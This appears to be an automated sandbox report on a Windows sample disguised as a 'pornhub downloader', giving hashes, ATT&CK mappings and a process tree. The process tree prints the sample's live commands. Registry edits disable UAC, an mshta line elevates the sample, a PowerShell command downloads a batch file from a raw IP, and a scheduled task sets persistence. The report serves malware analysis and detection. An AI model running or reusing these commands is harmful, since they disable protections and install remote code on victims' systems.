Analysis
-
max time kernel
117s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
28/09/2024, 11:49
General
-
Target
pornhub_downloader.1.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 35 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AF71.tmp\AF72.tmp\AF73.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\B0AA.tmp\B0AB.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:275457 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
Filesize
252B
MD570c8f6f2159c8c5957d5544ad22d3529
SHA1ea42380d68ca69c059966d40b232fecb8ea2f899
SHA25673b413860d55222ff0885385fedcd8bb633bde07029af92f4145db89547ba565
SHA51285479085d5dd9d8231368970cf9214c2a5d57385c385cf9dfc1fbfb51fba697e6a5fdc393fedfe5a40fbdfc549bd4a3925a8fa222c5bde4301ad495f25779806
-
Filesize
342B
MD57e5ba342b4ec528ceccb592aa759e810
SHA187682a7ecfa4dfdba0519f6fedba8acbe3c8de35
SHA256459f24cc6dc5f993d25637b4a61b61ace7e52fbf5238526294c2671dc60c9219
SHA512a1134ccee7a939a8ec23195147d393b939962dabea389db546efc22f120476efff3fd3153d1f349595bccd7d1849fff54c3c97bdf93e06fcda40ae02bf93e757
-
Filesize
342B
MD5829401529dac91cad71943de5647f653
SHA1bdccc25ad4b7502465de681dac6df14ef881e651
SHA25676495fbf6abd8334546e7e6f6ff753a2c1b47bfc9169fa1d1cb94340642901ac
SHA5129f4edcb5693dc30a34b17a52add808f93d9d489d9ce7f2a84e27fb488f3222843c64c68bffe91fc80d768310611388b347e96fda08907de19472751a6bd4a504
-
Filesize
342B
MD5bf095f27e33ea48697a86e570615716d
SHA18d97657f7bac18eee58151039cd30cb228099e6a
SHA2562b58b74cb36f397e09c6c407d4f0334201a2c1ec7c23d91344e27e8fdeed9a97
SHA512a36c668a2f661cccb1b50dd42e676d19e9f088348b1344e963b1d4f081bd7301ed4f7ad3392299190383a183e740cb35246c0de47dd6e9d3ec0a9e8613676303
-
Filesize
342B
MD51d87abce517a3a6c1ef7fc045c1e4615
SHA188302a893c91037953f98ac91b3a8c18e81e924a
SHA2568b60ba602c548df29699bf85bef3e16f934babf2cdbf10c8820f17ed15602c23
SHA5124396d97c4e5767dc4888b736aba046473643955c0e54d32f6d7eea68a153a1f8eef830f85286149a19b2a2e23fd2ecfd3eaf06271164f2c6baf0f31639aec95d
-
Filesize
342B
MD51d850af5bd33aedbf23097609fd16162
SHA13c675add08eac34eacc6286033a698e5b6f128fa
SHA256b5c5fd1996325b3fed47aa9cf21c1bdfa00527bf8330f7a13967e34beb38b746
SHA51202559e123bbf616d0e00ec431b8d289d5dd07139e20993ad55ec43d6c3833ed12a07d731ac970a7e09a23b5ab9ec83c1afb9e1213b5b619a56a10610579cacad
-
Filesize
342B
MD50379ef8988d9954229fc6d4859c19183
SHA18832650bc25ed80ea11651ce27168e76156a5628
SHA256dee9804e55bcfb6a042aaca853941325628b6bb0701c501ac354f22c0687552c
SHA5126adac14ddd77e175c557272a296ffa4b017c2bcaabf9785db58f5cd52a667b152a9786f64bdeb18ce47a7f56ffff64f09e6ccf5580487133edd6600179199355
-
Filesize
342B
MD598c4c182743a1626646a36bae789fadf
SHA1be560944bd2009ed471f6118e2e254221e9a1b15
SHA2567a45ac32f1bab43882bfb14b0aece2d3f4a226292cca1ca6d3df07a52e83cb06
SHA5123fcb90b0d4bffb38423b828d0f317c55d1540ff4c9ec26d904e068cbdf5260ede01b3e44c3fd2f7544f478cdbd250bcf02d91d929117a930b7b8cbc10a0d4519
-
Filesize
342B
MD570378da0395d3e34c1e588be75b8c1df
SHA106f0bbf2706101809793ea1118598fe698398021
SHA256272a9801f4b2222f759957d876ecd8c1a591424d47640be890dcdc021117669c
SHA5124f082c466e17dd14134007976a8b2689ff843a0e042ab3028521f98e47cde9d4914c7c5ec09c76e4035fce3502c3ce5424e31850f3f7ef98d6ff0ea3b92f6356
-
Filesize
342B
MD5119ed8ada122bbe311a0e39842367592
SHA107e66cfbcfeeefe3604a1e2f732637c20c77b4dc
SHA25617152b255948c53657fddc6528adaf0ce9859204fe18502c2077f29bac49edb1
SHA512fbc81ad887af7eea1c59284bf4f37c13353c7c112ebca5a4516afd9509cefc28d028d629535558a1ce726b58b7a2385599763e1cfdc486a134a940eb948c8c8e
-
Filesize
342B
MD55fed1c0fb435d5388f73122481974314
SHA17a4efe1369eb9988b0493a35340ef37281827dff
SHA256ed88f39fc8bae9c9cf6360959d35352fac2fe7e2633d8b245f6dcd95bdc3a8ec
SHA512c5f421aa632bb08fc8cdb025b8ac5c004b5066659aaae82996cc30f77f85de652aaead57dcf4b8076dda663861a64c4509266bdecfd5c7b494de48c0613333bb
-
Filesize
342B
MD5a42f19306115371e40cd722fb3a8692a
SHA190a6332e3d7401301fb07dd55e71d196987d2cba
SHA256fc11f107c01b3518fa9b352b97f74f5ced8ef601b6be92e4a64816a2b6794b05
SHA5126a3a0c2d32c29699085500838043911ab55e206ce406660031cf18970d30179c845203f39f22330cdb4a9ecdb843cfff4a3123b87bc0781e6013ec742e960ebc
-
Filesize
342B
MD505ed0c4a0bc03deb8e8bf23885f0ba0e
SHA1b53f60c6b605fa13b3cac9e8b0690a2822e2b542
SHA256bc3f2b73365395cb1ff0187d4c663a87c0a784d8d8e13342c92c62243388085e
SHA512a2b10eab403a9fd185d3e33e9e5c4b3a4044be4aaedd3b59a83571cd9ec5ce1b79f9694334cff9af6131f6fee0248f355775e73d3f7650a1b8bb0b779060e417
-
Filesize
342B
MD52ecb4c288200989d24b7cd387ec627d3
SHA11a450c4e942f0aae842e9b19d1ef738134255148
SHA256a641bff1692d8c9a9d682a02d592d1267b227ad91c5ad5d240db8cc72de3adf6
SHA512e998f77a1d7978a93d3cdbaf2101a552ebe4fbfa4d1c605b4ec0b658e5ca71af6af5806e41ef070742ca132456343b766c42088f43d0a8097fd178ec1ed81a78
-
Filesize
342B
MD579cffec7af0bd41b8a35ec5f919bcffe
SHA114c085110fd2c99d188dba487da6ffd16fefcb40
SHA256e55ab997e993f9b9b165e7e6fc6bbb021c040fafc36bf23a315badd7686f42ec
SHA5122c8032b241893baf6b9b6e61319f07da7233495081db1c0ebdf83084e2cec70cb73071bbe07da4c04c0e264ac79e98ff339df669f7407994f64f70d557efac8a
-
Filesize
342B
MD534819fb8ab482ab84ba21a9675115d12
SHA1cc202d65ce37aec15d4cb576f4009e3065053c25
SHA256517c81d918dc711cc85a9dde7044221f1d5ec7c9a99b37b095bdfaee2dd3a6ab
SHA512d85148eeadf1ac8dd5651ae804bdc142fc88c4f57aad23f9db5172783f9c78fedfdeec2b9cc6103340e9b3b2409295e324d07aef1bbc385dd50fa85768bed2f6
-
Filesize
342B
MD55ac7c0c2d6a88eccc4916ff0965fb4a4
SHA1be08eb834431ce93b1e02dacdb227e131e04c8f9
SHA2567ac0dbf33e39d4302da19b5e3a435044080818da83b6f82e0b054279b54e42f6
SHA5122dbedb3f7a38e494e7dba709d66046f20fb1fa0198da30789988c3cca8af9fb20c9569e3b0078b64762a5c51744e440759f2305a27aad8384c80cade9bda9dd8
-
Filesize
342B
MD55e6c62c9cd5976201bfcbaef142477b6
SHA19a5dea5e5dc50c69ed4e2c06fb123502068d9c3f
SHA2569fe7ae5ef4d6f8afe7b4d242abf78d74e744935e9adbd471336b2a4b3432e1a6
SHA5122613937e002cb76131f90b428d160d54cbbb409436395fa837cdbee456210c9baac58bdd8e5c296770a5d3ec93c339b4b6ea19302f99898f7a59fc8eaffeaaaf
-
Filesize
342B
MD5a732324ae20e687e3e387082e7a43a3d
SHA190fbe9766936734c48f15328d89325c37ece9abd
SHA25659c49cd5fb8ff1bae0178f5f63dd693fa32cd8bb6b699279625c70df83fb2d3a
SHA512ea96435577df4aaf8131b4b016af14fcca1756a85c5985b101fa3440fa57e70e57b32df630d235293b926a9ccb37bc4d2685e5a63806b7292391594129a2af68
-
Filesize
342B
MD55d79819c6d698fd2084056b12995f029
SHA1256390a048e31a9d1f8ce3de3aa4cca904034f38
SHA25671c23ec9623e89d4ea57c230e66b3274fd5e9f97ed96a8ea305a5bd9a51b6f4f
SHA512e401dd8feee48b26bdc30737a94183beb9985570577832bf4a996e4d896641cb5a6b835f931c9a4fa00fdfd4c409b11cefaff9fab3e590d5118c664f3b520776
-
Filesize
342B
MD5014c85bbc81b8a1272e03b60c1d8d0b5
SHA18572f9706910411ce1438e1c71b52b4a192f1df0
SHA25685c2d25f5040427bad549351ae2505e831dc13082e3e3707452df8f198335fa9
SHA512c9c86d278d7ba291ee43d031c3c1baf18687291890b79c80cc766c180ccdd9a051e64da0bd635d3ee7fed99e1ae2a21fc3a7e5091f35b3fecf87343df3ebc4fd
-
Filesize
342B
MD50d2443cdb88559fe7195c9d1f75ec712
SHA181736751c00b54bd86d1ff4c42c1d5a4f9ad5c49
SHA2564531592cccace086ab455c2ba4e8a286dc7ef8eb7f6c3f4359cbb308444639ee
SHA512436d1dd342e9412babea95744e0986f2fd982f76149f4f4ab3a481cacb9eb271691633365054c362d7e40f9d5cc2697c7c721f1547a93752e3323d7bea5106b0
-
Filesize
342B
MD5b050a26dd4785325b9c16c5ca29443e6
SHA1270131841fc07e9ee2ede2c9250879ca0953cae1
SHA256f1c75bb5fdf2de442c1224a6cd61eace566230aab26e0f65fa6c9853c6b14fad
SHA51259c5b9c3873c48a8f89776553237c1fdc495876b8ac0bfbcc28bbd89b360521a63768176d70a15c5a474260c2fcd377a93d97951990b3abd74a4a27a5d9c0a66
-
Filesize
342B
MD590062317a0c0382ec39512f6b176d81f
SHA125b17993cf474a784436b33acb20a24c028fb1c4
SHA256c94ba4548ed06ca5777809a4c9d7333e9422a3b02849f636b2a7756a2a0830b8
SHA512c305f57dde545381ff3ad69e976aeb2f913e7ba967c8ce4548f2c681e5de3245c298050da2d5fe27615d29c2452582ee608e271c773e43ec53c56d2e3ac8c594
-
Filesize
342B
MD5b6f2be51139d03eaa63e08e86a21209b
SHA16688bd4bd70cca511592a1c22343568c409d4b93
SHA256b92f78cb2c139eef53aadc600c0b9a066294b9ba1acf372490c59778514ceece
SHA512b808cb9e3b6c9a6e45b3186bbece8d9fa69bf216aadb6f3edf8f2e7a84a34c978939723b087fba273b4aa245051d67bb7cba1745efb2cfbedc4bcc590e1cd48a
-
Filesize
342B
MD53227dc64bb66191e8208645ff6ed7da0
SHA113e65928474beb96c0e9cef8fd1d4cfa4b78a766
SHA2563715bfd6f5aaf3267ea9498fd54ffadaab8cfdd1a44811dd7dc421c07011a065
SHA5128653895697a9599eda682dc5a1b3c75205defe8005634d2e0f063c6ee316da6b1ae56d3ebc468c1db97a1e4baadaa8fa48099d5b7b42966d2a48313da2738f68
-
Filesize
342B
MD57995147da764bf62734bdbc143b76487
SHA1c9f6e6c12e24d725d290f5f8a1acdf1b84798dcb
SHA256d8a43362637250dec759148c1622d39e1399a629421f340d19eaa9fad09932c3
SHA512beb181b0cd2a110f4908cb9fd0ec8ad02cc7aa6eb0b38ca9ba73e51f22fe967d31d1d8f3703f489ecf1b07cea23feed88c35889138285e43e554a7cd6a02a92e
-
Filesize
342B
MD5fa9151f692642640b23b416d7b1700ff
SHA12f82b3001bc403ea8594ce199d9a005c17056b07
SHA256ba6f14ecadc9330b39a231836838a1d089556630cd10dcfcfcfbff56e94a0335
SHA512652a9d96f322fd7795e9ee4b452d11ebada27502f51037e923dc94a1a0422344e4eb3b50a19f1d6711e7700cffa78199f1c31205735090cb5f79773302706b2e
-
Filesize
342B
MD55ec9f881ca5d3ff840a4a645a2654263
SHA1f25f199eb375aee2ea779e28334555e4d3f5a251
SHA2566a43e03952d58f00b80435e0285f0b67ab75f272242543baf020da91319bb4b7
SHA5124a9a8832072bfde61c75ef232ec8bdec571df9c9b867533e8babe29de0d593f5282f1b7ab32640bb48f4274cbba09196e915cb260c721fa4c605f990600bee35
-
Filesize
342B
MD5e1dc73ff28edf91a0e5d67fb43f3a1c2
SHA1d709c616eef406806154a0ea5c9dbd034ecdadb8
SHA25683df739759ad45ba877f0ac62bfdfb56bed3cc5520e43c6e078431f06b078bc7
SHA512976426ddcd86c75a9ee3ec60cb35884553127247e61f0b65904187891e65a2d65852b1e11174d7e049056799abfbc85652424637aa7a9a0bbcf0a878e8bda327
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b